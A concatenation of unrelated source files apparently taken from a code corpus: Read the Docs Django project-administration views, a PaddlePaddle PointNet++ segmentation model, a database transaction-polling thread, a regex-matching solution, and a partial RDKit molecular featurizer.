HttpResponseRedirect,
)
from django.middleware.csrf import get_token
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from django.views.generic import ListView, TemplateView, View
from formtools.wizard.views import SessionWizardView
from vanilla import CreateView, DeleteView, DetailView, GenericView, UpdateView
from readthedocs.builds.forms import VersionForm
from readthedocs.builds.models import Version
from readthedocs.core.mixins import ListViewWithForm, LoginRequiredMixin
from readthedocs.core.utils import broadcast, prepare_build, trigger_build
from readthedocs.integrations.models import HttpExchange, Integration
from readthedocs.oauth.services import registry
from readthedocs.oauth.tasks import attach_webhook
from readthedocs.oauth.utils import update_webhook
from readthedocs.projects import tasks
from readthedocs.projects.forms import (
DomainForm,
EmailHookForm,
EnvironmentVariableForm,
IntegrationForm,
ProjectAdvancedForm,
ProjectAdvertisingForm,
ProjectBasicsForm,
ProjectExtraForm,
ProjectRelationshipForm,
RedirectForm,
TranslationForm,
UpdateProjectForm,
UserForm,
WebHookForm,
build_versions_form,
)
from readthedocs.projects.models import (
Domain,
EmailHook,
EnvironmentVariable,
Project,
ProjectRelationship,
WebHook,
)
from readthedocs.projects.notifications import EmailConfirmNotification
from readthedocs.projects.signals import project_import
from readthedocs.projects.views.base import ProjectAdminMixin, ProjectSpamMixin
from ..tasks import retry_domain_verification
log = logging.getLogger(__name__)
class PrivateViewMixin(LoginRequiredMixin):
pass
class ProjectDashboard(PrivateViewMixin, ListView):
"""Project dashboard."""
model = Project
template_name = 'projects/project_dashboard.html'
def validate_primary_email(self, user):
"""
Sends a persistent error notification.
Checks if the user has a primary email or if the primary email
is verified or not. Sends a persistent error notification if
either of the condition is False.
"""
email_qs = user.emailaddress_set.filter(primary=True)
email = email_qs.first()
if not email or not email.verified:
notification = EmailConfirmNotification(user=user, success=False)
notification.send()
def get_queryset(self):
return Project.objects.dashboard(self.request.user)
def get(self, request, *args, **kwargs):
self.validate_primary_email(request.user)
return super(ProjectDashboard, self).get(self, request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
@login_required
def project_manage(__, project_slug):
"""
Project management view.
Where you will have links to edit the projects' configuration, edit the
files associated with that project, etc.
Now redirects to the normal /projects/<slug> view.
"""
return HttpResponseRedirect(reverse('projects_detail', args=[project_slug]))
class ProjectUpdate(ProjectSpamMixin, PrivateViewMixin, UpdateView):
form_class = UpdateProjectForm
model = Project
success_message = _('Project settings updated')
template_name = 'projects/project_edit.html'
lookup_url_kwarg = 'project_slug'
lookup_field = 'slug'
def get_queryset(self):
return self.model.objects.for_admin_user(self.request.user)
def get_success_url(self):
return reverse('projects_detail', args=[self.object.slug])
class ProjectAdvancedUpdate(ProjectSpamMixin, PrivateViewMixin, UpdateView):
form_class = ProjectAdvancedForm
model = Project
success_message = _('Project settings updated')
template_name = 'projects/project_advanced.html'
lookup_url_kwarg = 'project_slug'
lookup_field = 'slug'
def get_queryset(self):
return self.model.objects.for_admin_user(self.request.user)
def get_success_url(self):
return reverse('projects_detail', args=[self.object.slug])
@login_required
def project_versions(request, project_slug):
"""
Project versions view.
Shows the available versions and lets the user choose which ones he would
like to have built.
"""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
if not project.is_imported:
raise Http404
form_class = build_versions_form(project)
form = form_class(data=request.POST or None)
if request.method == 'POST' and form.is_valid():
form.save()
messages.success(request, _('Project versions updated'))
project_dashboard = reverse('projects_detail', args=[project.slug])
return HttpResponseRedirect(project_dashboard)
return render(
request,
'projects/project_versions.html',
{'form': form, 'project': project},
)
@login_required
def project_version_detail(request, project_slug, version_slug):
"""Project version detail page."""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
version = get_object_or_404(
Version.objects.public(
user=request.user,
project=project,
only_active=False,
),
slug=version_slug,
)
form = VersionForm(request.POST or None, instance=version)
if request.method == 'POST' and form.is_valid():
version = form.save()
if form.has_changed():
if 'active' in form.changed_data and version.active is False:
log.info('Removing files for version %s', version.slug)
broadcast(
type='app',
task=tasks.remove_dirs,
args=[version.get_artifact_paths()],
)
version.built = False
version.save()
url = reverse('project_version_list', args=[project.slug])
return HttpResponseRedirect(url)
return render(
request,
'projects/project_version_detail.html',
{'form': form, 'project': project, 'version': version},
)
@login_required
def project_delete(request, project_slug):
"""
Project delete confirmation view.
Make a project as deleted on POST, otherwise show a form asking for
confirmation of delete.
"""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
if request.method == 'POST':
broadcast(
type='app',
task=tasks.remove_dirs,
args=[(project.doc_path,)],
)
project.delete()
messages.success(request, _('Project deleted'))
project_dashboard = reverse('projects_dashboard')
return HttpResponseRedirect(project_dashboard)
return render(request, 'projects/project_delete.html', {'project': project})
class ImportWizardView(ProjectSpamMixin, PrivateViewMixin, SessionWizardView):
"""Project import wizard."""
form_list = [
('basics', ProjectBasicsForm),
('extra', ProjectExtraForm),
]
condition_dict = {'extra': lambda self: self.is_advanced()}
def get_form_kwargs(self, step=None):
"""Get args to pass into form instantiation."""
kwargs = {}
kwargs['user'] = self.request.user
if step == 'basics':
kwargs['show_advanced'] = True
return kwargs
def get_template_names(self):
"""Return template names based on step name."""
return 'projects/import_{}.html'.format(self.steps.current)
def done(self, form_list, **kwargs):
"""
Save form data as object instance.
Don't save form data directly, instead bypass documentation building and
other side effects for now, by signalling a save without commit. Then,
finish by added the members to the project and saving.
"""
form_data = self.get_all_cleaned_data()
extra_fields = ProjectExtraForm.Meta.fields
# expect the first form; manually wrap in a list in case it's a
# View Object, as it is in Python 3.
basics_form = list(form_list)[0]
# Save the basics form to create the project instance, then alter
# attributes directly from other forms
project = basics_form.save()
tags = form_data.pop('tags', [])
for tag in tags:
project.tags.add(tag)
for field, value in list(form_data.items()):
if field in extra_fields:
setattr(project, field, value)
project.save()
# TODO: this signal could be removed, or used for sync task
project_import.send(sender=project, request=self.request)
self.trigger_initial_build(project)
return HttpResponseRedirect(
reverse('projects_detail', args=[project.slug]),
)
def trigger_initial_build(self, project):
"""Trigger initial build."""
update_docs, build = prepare_build(project)
if (update_docs, build) == (None, None):
return None
task_promise = chain(
attach_webhook.si(project.pk, self.request.user.pk),
update_docs,
)
async_result = task_promise.apply_async()
return async_result
def is_advanced(self):
"""Determine if the user selected the `show advanced` field."""
data = self.get_cleaned_data_for_step('basics') or {}
return data.get('advanced', True)
class ImportDemoView(PrivateViewMixin, View):
"""View to pass request on to import form to import demo project."""
form_class = ProjectBasicsForm
request = None
args = None
kwargs = None
def get(self, request, *args, **kwargs):
"""Process link request as a form post to the project import form."""
self.request = request
self.args = args
self.kwargs = kwargs
data = self.get_form_data()
project = Project.objects.for_admin_user(
request.user,
).filter(repo=data['repo']).first()
if project is not None:
messages.success(
request,
_('The demo project is already imported!'),
)
else:
kwargs = self.get_form_kwargs()
form = self.form_class(data=data, **kwargs)
if form.is_valid():
project = form.save()
project.save()
self.trigger_initial_build(project)
messages.success(
request,
_('Your demo project is currently being imported'),
)
else:
messages.error(
request,
_('There was a problem adding the demo project'),
)
return HttpResponseRedirect(reverse('projects_dashboard'))
return HttpResponseRedirect(
reverse('projects_detail', args=[project.slug]),
)
def get_form_data(self):
"""Get form data to post to import form."""
return {
'name': '{}-demo'.format(self.request.user.username),
'repo_type': 'git',
'repo': 'https://github.com/readthedocs/template.git',
}
def get_form_kwargs(self):
"""Form kwargs passed in during instantiation."""
return {'user': self.request.user}
def trigger_initial_build(self, project):
"""
Trigger initial build.
Allow to override the behavior from outside.
"""
return trigger_build(project)
class ImportView(PrivateViewMixin, TemplateView):
"""
On GET, show the source an import view, on POST, mock out a wizard.
If we are accepting POST data, use the fields to seed the initial data in
:py:class:`ImportWizardView`. The import templates will redirect the form to
`/dashboard/import`
"""
template_name = 'projects/project_import.html'
wizard_class = ImportWizardView
def get(self, request, *args, **kwargs):
"""
Display list of repositories to import.
Adds a warning to the listing if any of the accounts connected for the
user are not supported accounts.
"""
deprecated_accounts = (
SocialAccount.objects
.filter(user=self.request.user)
.exclude(
provider__in=[
service.adapter.provider_id for service in registry
],
)
) # yapf: disable
for account in deprecated_accounts:
provider_account = account.get_provider_account()
messages.error(
request,
mark_safe((
_(
'There is a problem with your {service} account, '
'try reconnecting your account on your '
'<a href="{url}">connected services page</a>.',
).format(
service=provider_account.get_brand()['name'],
url=reverse('socialaccount_connections'),
)
)), # yapf: disable
)
return super().get(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
initial_data = {}
initial_data['basics'] = {}
for key in ['name', 'repo', 'repo_type', 'remote_repository']:
initial_data['basics'][key] = request.POST.get(key)
initial_data['extra'] = {}
for key in ['description', 'project_url']:
initial_data['extra'][key] = request.POST.get(key)
request.method = 'GET'
return self.wizard_class.as_view(initial_dict=initial_data)(request)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['view_csrf_token'] = get_token(self.request)
context['has_connected_accounts'] = SocialAccount.objects.filter(
user=self.request.user,
).exists()
return context
class ProjectRelationshipMixin(ProjectAdminMixin, PrivateViewMixin):
model = ProjectRelationship
form_class = ProjectRelationshipForm
lookup_field = 'child__slug'
lookup_url_kwarg = 'subproject_slug'
def get_queryset(self):
self.project = self.get_project()
return self.model.objects.filter(parent=self.project)
def get_form(self, data=None, files=None, **kwargs):
kwargs['user'] = self.request.user
return super().get_form(data, files, **kwargs)
def form_valid(self, form):
broadcast(
type='app',
task=tasks.symlink_subproject,
args=[self.get_project().pk],
)
return super().form_valid(form)
def get_success_url(self):
return reverse('projects_subprojects', args=[self.get_project().slug])
class ProjectRelationshipList(ProjectRelationshipMixin, ListView):
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
ctx['superproject'] = self.project.superprojects.first()
return ctx
class ProjectRelationshipCreate(ProjectRelationshipMixin, CreateView):
pass
class ProjectRelationshipUpdate(ProjectRelationshipMixin, UpdateView):
pass
class ProjectRelationshipDelete(ProjectRelationshipMixin, DeleteView):
def get(self, request, *args, **kwargs):
return self.http_method_not_allowed(request, *args, **kwargs)
@login_required
def project_users(request, project_slug):
"""Project users view and form view."""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
form = UserForm(data=request.POST or None, project=project)
if request.method == 'POST' and form.is_valid():
form.save()
project_dashboard = reverse('projects_users', args=[project.slug])
return HttpResponseRedirect(project_dashboard)
users = project.users.all()
return render(
request,
'projects/project_users.html',
{'form': form, 'project': project, 'users': users},
)
@login_required
def project_users_delete(request, project_slug):
if request.method != 'POST':
return HttpResponseNotAllowed('Only POST is allowed')
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
user = get_object_or_404(
User.objects.all(),
username=request.POST.get('username'),
)
if user == request.user:
raise Http404
project.users.remove(user)
project_dashboard = reverse('projects_users', args=[project.slug])
return HttpResponseRedirect(project_dashboard)
@login_required
def project_notifications(request, project_slug):
"""Project notification view and form view."""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
email_form = EmailHookForm(data=None, project=project)
webhook_form = WebHookForm(data=None, project=project)
if request.method == 'POST':
if 'email' in request.POST.keys():
email_form = EmailHookForm(data=request.POST, project=project)
if email_form.is_valid():
email_form.save()
elif 'url' in request.POST.keys():
webhook_form = WebHookForm(data=request.POST, project=project)
if webhook_form.is_valid():
webhook_form.save()
emails = project.emailhook_notifications.all()
urls = project.webhook_notifications.all()
return render(
request,
'projects/project_notifications.html',
{
'email_form': email_form,
'webhook_form': webhook_form,
'project': project,
'emails': emails,
'urls': urls,
},
)
@login_required
def project_notifications_delete(request, project_slug):
"""Project notifications delete confirmation view."""
if request.method != 'POST':
return HttpResponseNotAllowed('Only POST is allowed')
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
try:
project.emailhook_notifications.get(
email=request.POST.get('email'),
).delete()
except EmailHook.DoesNotExist:
try:
project.webhook_notifications.get(
url=request.POST.get('email'),
).delete()
except WebHook.DoesNotExist:
raise Http404
project_dashboard = reverse('projects_notifications', args=[project.slug])
return HttpResponseRedirect(project_dashboard)
@login_required
def project_translations(request, project_slug):
"""Project translations view and form view."""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
form = TranslationForm(
data=request.POST or None,
parent=project,
user=request.user,
)
if request.method == 'POST' and form.is_valid():
form.save()
project_dashboard = reverse(
'projects_translations',
args=[project.slug],
)
return HttpResponseRedirect(project_dashboard)
lang_projects = project.translations.all()
return render(
request,
'projects/project_translations.html',
{
'form': form,
'project': project,
'lang_projects': lang_projects,
},
)
@login_required
def project_translations_delete(request, project_slug, child_slug):
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
subproj = get_object_or_404(
project.translations,
slug=child_slug,
)
project.translations.remove(subproj)
project_dashboard = reverse('projects_translations', args=[project.slug])
return HttpResponseRedirect(project_dashboard)
@login_required
def project_redirects(request, project_slug):
"""Project redirects view and form view."""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
form = RedirectForm(data=request.POST or None, project=project)
if request.method == 'POST' and form.is_valid():
form.save()
project_dashboard = reverse('projects_redirects', args=[project.slug])
return HttpResponseRedirect(project_dashboard)
redirects = project.redirects.all()
return render(
request,
'projects/project_redirects.html',
{'form': form, 'project': project, 'redirects': redirects},
)
@login_required
def project_redirects_delete(request, project_slug):
"""Project redirect delete view."""
if request.method != 'POST':
return HttpResponseNotAllowed('Only POST is allowed')
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
redirect = get_object_or_404(
project.redirects,
pk=request.POST.get('id_pk'),
)
if redirect.project == project:
redirect.delete()
else:
raise Http404
return HttpResponseRedirect(
reverse('projects_redirects', args=[project.slug]),
)
@login_required
def project_version_delete_html(request, project_slug, version_slug):
"""
Project version 'delete' HTML.
This marks a version as not built
"""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
version = get_object_or_404(
Version.objects.public(
user=request.user,
project=project,
only_active=False,
),
slug=version_slug,
)
if not version.active:
version.built = False
version.save()
broadcast(
type='app',
task=tasks.remove_dirs,
args=[version.get_artifact_paths()],
)
else:
return HttpResponseBadRequest(
"Can't delete HTML for an active version.",
)
return HttpResponseRedirect(
reverse('project_version_list', kwargs={'project_slug': project_slug}),
)
class DomainMixin(ProjectAdminMixin, PrivateViewMixin):
model = Domain
form_class = DomainForm
lookup_url_kwarg = 'domain_pk'
def get_success_url(self):
return reverse('projects_domains', args=[self.get_project().slug])
class DomainList(DomainMixin, ListViewWithForm):
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
# Retry validation on all domains if applicable
for domain in ctx['domain_list']:
retry_domain_verification.delay(domain_pk=domain.pk)
return ctx
class DomainCreate(DomainMixin, CreateView):
pass
class DomainUpdate(DomainMixin, UpdateView):
pass
class DomainDelete(DomainMixin, DeleteView):
pass
class IntegrationMixin(ProjectAdminMixin, PrivateViewMixin):
"""Project external service mixin for listing webhook objects."""
model = Integration
integration_url_field = 'integration_pk'
form_class = IntegrationForm
def get_queryset(self):
return self.get_integration_queryset()
def get_object(self):
return self.get_integration()
def get_integration_queryset(self):
self.project = self.get_project()
return self.model.objects.filter(project=self.project)
def get_integration(self):
"""Return project integration determined by url kwarg."""
if self.integration_url_field not in self.kwargs:
return None
return get_object_or_404(
Integration,
pk=self.kwargs[self.integration_url_field],
project=self.get_project(),
)
def get_success_url(self):
return reverse('projects_integrations', args=[self.get_project().slug])
def get_template_names(self):
if self.template_name:
return self.template_name
return 'projects/integration{}.html'.format(self.template_name_suffix)
class IntegrationList(IntegrationMixin, ListView):
pass
class IntegrationCreate(IntegrationMixin, CreateView):
def get_success_url(self):
return reverse(
'projects_integrations_detail',
kwargs={
'project_slug': self.get_project().slug,
'integration_pk': self.object.id,
},
)
class IntegrationDetail(IntegrationMixin, DetailView):
# Some of the templates can be combined, we'll avoid duplicating templates
SUFFIX_MAP = {
Integration.GITHUB_WEBHOOK: 'webhook',
Integration.GITLAB_WEBHOOK: 'webhook',
Integration.BITBUCKET_WEBHOOK: 'webhook',
Integration.API_WEBHOOK: 'generic_webhook',
}
def get_template_names(self):
if self.template_name:
return self.template_name
integration_type = self.get_integration().integration_type
suffix = self.SUFFIX_MAP.get(integration_type, integration_type)
return (
'projects/integration_{}{}.html'
.format(suffix, self.template_name_suffix)
)
class IntegrationDelete(IntegrationMixin, DeleteView):
def get(self, request, *args, **kwargs):
return self.http_method_not_allowed(request, *args, **kwargs)
class IntegrationExchangeDetail(IntegrationMixin, DetailView):
model = HttpExchange
lookup_url_kwarg = 'exchange_pk'
template_name = 'projects/integration_exchange_detail.html'
def get_queryset(self):
return self.model.objects.filter(integrations=self.get_integration())
def get_object(self):
return DetailView.get_object(self)
class IntegrationWebhookSync(IntegrationMixin, GenericView):
"""
Resync a project webhook.
The signal will add a success/failure message on the request.
"""
def post(self, request, *args, **kwargs):
# pylint: disable=unused-argument
if 'integration_pk' in kwargs:
integration = self.get_integration()
update_webhook(self.get_project(), integration, request=request)
else:
# This is a brute force form of the webhook sync, if a project has a
# webhook or a remote repository object, the user should be using
# the per-integration sync instead.
attach_webhook(
project_pk=self.get_project().pk,
user_pk=request.user.pk,
)
return HttpResponseRedirect(self.get_success_url())
def get_success_url(self):
return reverse('projects_integrations', args=[self.get_project().slug])
class ProjectAdvertisingUpdate(PrivateViewMixin, UpdateView):
model = Project
form_class = ProjectAdvertisingForm
success_message = _('Project has been opted out from advertisement support')
template_name = 'projects/project_advertising.html'
lookup_url_kwarg = 'project_slug'
lookup_field = 'slug'
def get_queryset(self):
return self.model.objects.for_admin_user(self.request.user)
def get_success_url(self):
return reverse('projects_advertising', args=[self.object.slug])
class EnvironmentVariableMixin(ProjectAdminMixin, PrivateViewMixin):
"""Environment Variables to be added when building the Project."""
model = EnvironmentVariable
form_class = EnvironmentVariableForm
lookup_url_kwarg = 'environmentvariable_pk'
def get_success_url(self):
return reverse(
'projects_environmentvariables',
args=[self.get_project().slug],
)
class EnvironmentVariableList(EnvironmentVariableMixin, ListView):
pass
class EnvironmentVariableCreate(EnvironmentVariableMixin, CreateView):
pass
class EnvironmentVariableDetail(EnvironmentVariableMixin, DetailView):
pass
class EnvironmentVariableDelete(EnvironmentVariableMixin, DeleteView):
# This removes the delete confirmation
def get(self, request, *args, **kwargs):
return self.http_method_not_allowed(request, *args, **kwargs)
|
the-stack_106_23285 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
"""
Contains PointNet++ SSG/MSG semantic segmentation models
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import paddle.fluid as fluid
from paddle.fluid.param_attr import ParamAttr
from paddle.fluid.initializer import Constant
from .pointnet2_modules import *
__all__ = ["PointNet2SemSegSSG", "PointNet2SemSegMSG"]
class PointNet2SemSeg(object):
def __init__(self, num_classes, num_points, use_xyz=True):
self.num_classes = num_classes
self.num_points = num_points
self.use_xyz = use_xyz
self.feed_vars = []
self.out_feature = None
self.pyreader = None
self.model_config()
def model_config(self):
self.SA_confs = []
self.FP_confs = []
def build_input(self):
self.xyz = fluid.layers.data(name='xyz', shape=[self.num_points, 3], dtype='float32', lod_level=0)
self.feature = fluid.layers.data(name='feature', shape=[self.num_points, 6], dtype='float32', lod_level=0)
self.label = fluid.layers.data(name='label', shape=[self.num_points, 1], dtype='int64', lod_level=0)
self.pyreader = fluid.io.PyReader(
feed_list=[self.xyz, self.feature, self.label],
capacity=64,
use_double_buffer=True,
iterable=False)
self.feed_vars = [self.xyz, self.feature, self.label]
def build_model(self, bn_momentum=0.99):
self.build_input()
xyzs, features = [self.xyz], [self.feature]
xyzi, featurei = xyzs[-1], fluid.layers.transpose(self.feature, perm=[0, 2, 1])
for i, SA_conf in enumerate(self.SA_confs):
xyzi, featurei = pointnet_sa_module(
xyz=xyzi,
feature=featurei,
bn_momentum=bn_momentum,
use_xyz=self.use_xyz,
name="sa_{}".format(i),
**SA_conf)
xyzs.append(xyzi)
features.append(fluid.layers.transpose(featurei, perm=[0, 2, 1]))
for i in range(-1, -(len(self.FP_confs) + 1), -1):
features[i - 1] = pointnet_fp_module(
unknown=xyzs[i - 1],
known=xyzs[i],
unknown_feats=features[i - 1],
known_feats=features[i],
bn_momentum=bn_momentum,
name="fp_{}".format(i+len(self.FP_confs)),
**self.FP_confs[i])
out = fluid.layers.transpose(features[0], perm=[0, 2, 1])
out = fluid.layers.unsqueeze(out, axes=[-1])
out = conv_bn(out, out_channels=128, bn=True, bn_momentum=bn_momentum, name="output_1")
out = fluid.layers.dropout(out, 0.5, dropout_implementation="upscale_in_train")
out = conv_bn(out, out_channels=self.num_classes, bn=False, act=None, name="output_2")
out = fluid.layers.squeeze(out, axes=[-1])
out = fluid.layers.transpose(out, perm=[0, 2, 1])
pred = fluid.layers.softmax(out)
# calc loss
self.loss = fluid.layers.cross_entropy(pred, self.label)
self.loss = fluid.layers.reduce_mean(self.loss)
# calc acc
pred = fluid.layers.reshape(pred, shape=[-1, self.num_classes])
label = fluid.layers.reshape(self.label, shape=[-1, 1])
self.acc1 = fluid.layers.accuracy(pred, label, k=1)
def get_feeds(self):
return self.feed_vars
def get_outputs(self):
return {"loss": self.loss, "accuracy": self.acc1}
def get_pyreader(self):
return self.pyreader
class PointNet2SemSegSSG(PointNet2SemSeg):
def __init__(self, num_classes, use_xyz=True):
super(PointNet2SemSegSSG, self).__init__(num_classes, use_xyz)
def model_config(self):
self.SA_confs = [
{
"npoint": 1024,
"radiuss": [0.1],
"nsamples": [32],
"mlps": [[32, 32, 64]],
},
{
"npoint": 256,
"radiuss": [0.2],
"nsamples": [32],
"mlps": [[64, 64, 128]],
},
{
"npoint": 64,
"radiuss": [0.4],
"nsamples": [32],
"mlps": [[128, 128, 256]],
},
{
"npoint": 16,
"radiuss": [0.8],
"nsamples": [32],
"mlps": [[256, 256, 512]],
},
]
self.FP_confs = [
{"mlp": [128, 128, 128]},
{"mlp": [256, 128]},
{"mlp": [256, 256]},
{"mlp": [256, 256]},
]
class PointNet2SemSegMSG(PointNet2SemSeg):
def __init__(self, num_classes, use_xyz=True):
super(PointNet2SemSegMSG, self).__init__(num_classes, use_xyz)
def model_config(self):
self.SA_confs = [
{
"npoint": 1024,
"radiuss": [0.05, 0.1],
"nsamples": [16, 32],
"mlps": [[16, 16, 32], [32, 32, 64]],
},
{
"npoint": 256,
"radiuss": [0.1, 0.2],
"nsamples": [16, 32],
"mlps": [[64, 64, 128], [64, 96, 128]],
},
{
"npoint": 64,
"radiuss": [0.2, 0.4],
"nsamples": [16, 32],
"mlps": [[128, 196, 256], [128, 196, 256]],
},
{
"npoint": 16,
"radiuss": [0.4, 0.8],
"nsamples": [16, 32],
"mlps": [[256, 256, 512], [256, 384, 512]],
},
]
self.FP_confs = [
{"mlp": [128, 128]},
{"mlp": [256, 256]},
{"mlp": [512, 512]},
{"mlp": [512, 512]},
]
|
the-stack_106_23288 | from threading import Thread, Event
import os, datetime, uuid, time, math, ast
from typing import List, Dict
from alphaz.models.database.structure import AlphaDatabase
from alphaz.models.main import AlphaClass, AlphaTransaction
from ..libs import transactions_lib
from core import core
LOG = core.get_logger('requests')
DB = core.db
class TransactionsThread(Thread): # PowerCounter class
def __init__(self, function,
message_types:List[str] = [],
database: AlphaDatabase = DB,
interval: int = 2,
timeout: int = 0,
pool_size:int = 20,
answer_lifetime = 3600,
args = [],
kwargs = {}
):
Thread.__init__(self)
self.function = function
self.message_types:List[str] = message_types
self.database: AlphaDatabase = database
self.interval:str = interval
self.timeout = timeout
self.pool_size:int = pool_size
self.answer_lifetime: int = answer_lifetime
self.args:list = args
self.kwargs:dict = kwargs
self.started: Event = Event()
self.running: Event= Event()
self.finished: Event = Event()
def ensure(self):
if not self.started.is_set() and not self.running.is_set():
self.start()
def run(self):
self.started.set()
count = 0
offset = 0
elapsed = 0
dts = datetime.datetime.now()
while not self.finished.is_set() and (self.timeout <= 0 or elapsed < self.timeout):
dt = datetime.datetime.now()
if not self.running.is_set():
self.running.set()
if count == 0:
#secs = (math.ceil(dt) - dt).total_seconds()
secs = 0
else:
secs = self.interval - offset
self.finished.wait(secs)
if not self.finished.is_set():
t = time.time()
self.process()
offset = time.time() - t
count += 1
elapsed = (dt - dts).total_seconds()
if self.timeout > 0 and elapsed > self.timeout:
LOG.info("Thread reachs its limit")
else:
LOG.info("Thread ended")
def process(self):
requests = transactions_lib.get_requests(self.database, message_types=self.message_types, limit=self.pool_size)
if len(requests) == 0:
return
requests = [AlphaTransaction(x) for x in requests]
LOG.info('Processing %s requests ...'%len(requests))
uuids = []
for request in requests:
answer = ''
try:
uuid = request.uuid
parameters = request.message
uuids.append(uuid)
LOG.debug('REQUEST: \n\n'+str(parameters)+'\n')
if type(parameters) is not dict:
LOG.error('Answer is of the wrong type')
continue
answer = self.function(request, *self.args, **self.kwargs)
if answer is not None:
answer = str(answer)
LOG.debug('Sending answer: '+answer)
except Exception as ex:
LOG.error("Cannot send answser",ex=ex)
finally:
transactions_lib.send_answer(self.database, uuid, answer,
message_type=str(request.message_type), answer_lifetime=self.answer_lifetime)
transactions_lib.delete_requests(self.database, uuids)
def cancel(self):
self.finished.set()
self.started.clear()
self.running.clear() |
the-stack_106_23290 | class Solution:
def isMatch(self, s: str, p: str) -> bool:
dp = [[False for _ in range(len(s) + 1)] for _ in range(len(p) + 1)]
dp[0][0] = True
for i in range(1,len(p)+1):
if p[i-1] == '*':
dp[i][0] = dp[i-2][0]
for i in range(1, len(p) + 1):
for j in range(1, len(s) + 1):
pChar = p[i-1]
schar = s[j-1]
pPrev = p[i-2] if i > 1 else ''
if self.isCharMAtch(pChar, schar):
dp[i][j] = dp[i-1][j-1]
elif pChar == '*':
if self.isCharMAtch(pPrev, schar):
# using 1 of prev or multiple of prev
dp[i][j] = dp[i-1][j] or dp[i][j-1]
# using 0 of prev
if dp[i-2][j]:
dp[i][j] = True
return dp[len(p)][len(s)]
def isCharMAtch(self, pChar, sChar):
return pChar == '.' or pChar == sChar
ob = Solution()
source = "aasdfasdfasdfasdfas"
pattern = "aasdf.*asdf.*asdf.*asdf.*s"
print(ob.isMatch(source, pattern)) |
the-stack_106_23292 | import logging
import numpy as np
import torch
from rdkit import Chem
from rdkit import RDLogger
from rdkit.Chem.Scaffolds import MurckoScaffold
from federatedscope.core.splitters.utils import dirichlet_distribution_noniid_slice
from federatedscope.core.splitters.graph.scaffold_splitter import generate_scaffold
logger = logging.getLogger(__name__)
RDLogger.DisableLog('rdApp.*')
class GenFeatures:
r"""Implementation of 'CanonicalAtomFeaturizer' and 'CanonicalBondFeaturizer' in DGL.
Source: https://lifesci.dgl.ai/_modules/dgllife/utils/featurizers.html
Arguments:
data: PyG.data in PyG.dataset.
Returns:
data: PyG.data, data passing featurizer.
"""
def __init__(self):
self.symbols = [
'C', 'N', 'O', 'S', 'F', 'Si', 'P', 'Cl', 'Br', 'Mg',
'Na', 'Ca', 'Fe', 'As', 'Al', 'I', 'B', 'V', 'K', 'Tl',
'Yb', 'Sb', 'Sn', 'Ag', 'Pd', 'Co', 'Se', 'Ti', 'Zn',
'H', 'Li', 'Ge', 'Cu', 'Au', 'Ni', 'Cd', 'In', 'Mn',
'Zr', 'Cr', 'Pt', 'Hg', 'Pb', 'other'
]
self.hybridizations = [
Chem.rdchem.HybridizationType.SP,
Chem.rdchem.HybridizationType.SP2,
Chem.rdchem.HybridizationType.SP3,
Chem.rdchem.HybridizationType.SP3D,
Chem.rdchem.HybridizationType.SP3D2,
'other',
]
self.stereos = [
Chem.rdchem.BondStereo.STEREONONE,
Chem.rdchem.BondStereo.STEREOANY,
Chem.rdchem.BondStereo.STEREOZ,
Chem.rdchem.BondStereo.STEREOE,
Chem.rdchem.BondStereo.STEREOCIS,
Chem.rdchem.BondStereo.STEREOTRANS,
]
def __call__(self, data):
mol = Chem.MolFromSmiles(data.smiles)
xs = []
for atom in mol.GetAtoms():
symbol = [0.] * len(self.symbols)
if atom.GetSymbol() in self.symbols:
symbol[self.symbols.index(atom.GetSymbol())] = 1.
else:
symbol[self.symbols.index('other')] = 1.
degree = [0.] * 10
degree[atom.GetDegree()] = 1.
implicit = [0.] * 6
implicit[atom.GetImplicitValence()] = 1.
formal_charge = atom.GetFormalCharge()
radical_electrons = atom.GetNumRadicalElectrons()
hybridization = [0.] * len(self.hybridizations)
if atom.GetHybridization() in self.hybridizations:
hybridization[self.hybridizations.index(atom.GetHybridization())] = 1.
else:
hybridization[self.hybridizations.index('other')] = 1.
aromaticity = 1. if atom.GetIsAromatic() else 0.
hydrogens = [0.] * 5
hydrogens[atom.GetTotalNumHs()] = 1.
x = torch.tensor(symbol + degree + implicit +
[formal_charge] + [radical_electrons] +
hybridization + [aromaticity] + hydrogens)
xs.append(x)
data.x = torch.stack(xs, dim=0)
edge_attrs = []
for bond in mol.GetBonds():
bond_type = bond.GetBondType()
single = 1. if bond_type == Chem.rdchem.BondType.SINGLE else 0.
double = 1. if bond_type == Chem.rdchem.BondType.DOUBLE else 0.
triple = 1. if bond_type == Chem.rdchem.BondType.TRIPLE else 0.
aromatic = 1. if bond_type == Chem.rdchem.BondType.AROMATIC else 0.
conjugation = 1. if bond.GetIsConjugated() else 0.
ring = 1. if bond.IsInRing() else 0.
stereo = [0.] * 6
